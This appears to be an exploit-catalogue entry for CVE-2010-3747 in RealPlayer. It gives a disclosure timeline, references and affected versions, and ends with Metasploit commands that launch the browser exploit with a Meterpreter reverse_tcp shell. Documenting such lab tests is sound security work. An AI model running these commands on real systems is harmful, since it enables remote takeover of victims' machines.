CVE-2010-3747 : RealNetworks RealPlayer CDDA URI Initialization Vulnerability

Timeline :

Vulnerability discovered by CHkr_D591
Vulnerability transmitted to ZDI by CHkr_D591
Vulnerability reported to the vendor by ZDI the 2009-11-24
Coordinated public release of advisory the 2010-10-15
Saint PoC provided the 2010-10-22
Metasploit PoC provided the 2011-03-17

PoC provided by :

bannedit
sinn3r

Reference(s) :

CVE-2010-3747
ZDI-10-210
OSVDB-68673
RealNetworks

Affected version(s) :

RealPlayer 11 to 11.1
RealPlayer SP 1.0 to 1.1.4

Tested on Windows XP SP3 with :

RealPlayer SP 1.1
IE 6.0.2900.5512

Description :

This module exploits a initialization flaw within RealPlayer 11/11.1 and RealPlayer SP 1.0 – 1.1.4. An abnormally long CDDA URI causes an object initialization failure. However, this failure is improperly handled and uninitialized memory executed.

Commands :

use exploit/windows/browser/realplayer_cdda_uri
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid